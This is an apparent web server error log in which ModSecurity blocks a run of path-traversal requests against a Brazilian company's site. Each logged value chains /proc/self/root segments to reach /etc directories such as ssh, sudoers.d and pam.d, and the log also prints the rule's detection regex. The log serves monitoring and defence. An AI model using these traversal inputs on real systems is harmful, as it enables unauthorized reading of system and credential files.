[Fri Mar 20 03:52:29.359046 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:46712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzurfqxLDW4GITHUkSzCgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:52:35.343011 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:50868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzus9a6ubjKNq_cu4af3AAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:52:41.720173 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:49060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuuRCii7xarUs8iHY1fQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:52:44.068451 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.241.31:39388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuvAF0L0L-SsrnPo45QAAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:52:45.387293 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.241.31:34150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuvfHIg5MgXLBnicPMtgAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:52:51.012267 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:34158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuw_XLqtnMIWvjpaJqRgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:52:52.802978 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:58022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuxNa6ubjKNq_cu4af9QAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:52:53.356090 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:60992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuxeoXxyEfFpUF8f9U5AAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:52:54.115315 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:33984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuxvqxLDW4GITHUkSzFwAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:53:05.348667 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:33998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzu0RCii7xarUs8iHY1kQAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:53:06.861508 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:32774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzu0vqxLDW4GITHUkSzKQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:53:12.475484 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:58838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzu2AF0L0L-SsrnPo45XAAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:53:48.371513 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:40560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzu_OoXxyEfFpUF8f9VJQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:53:49.727758 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.243.128:60398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzu_fqxLDW4GITHUkSzTAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:53:52.030748 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:60414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzu_zJ3M9BSuKP7CAbhoAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:53:53.447135 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.243.128:60426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvAfHIg5MgXLBnicPM9wAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:54:32.231452 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:60434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvKAF0L0L-SsrnPo45wAAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:54:36.540637 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.243.128:35584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvLLninkcc-iUj5AovEAAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:54:37.929793 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:35588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvLda6ubjKNq_cu4agLgAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:54:43.031340 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:35592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvM_qxLDW4GITHUkSzewAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:04.391499 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:45200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvSPqxLDW4GITHUkSzoAAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
